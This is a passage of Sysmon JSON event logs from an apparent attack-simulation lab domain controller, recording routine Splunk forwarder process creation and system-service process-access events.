0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.128","ProcessGuid":"{A837DB8D-0371-5F25-0000-0010EEE00A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5801,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010EEE00A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010EEE00A00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5802,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0371-5F25-0000-0010EEE00A00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0371-5F25-0000-0010EEE00A00}","TargetProcessId":"3788","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5803,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5804,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5805,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5806,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5807,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:53.127","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5808,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:53.127\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 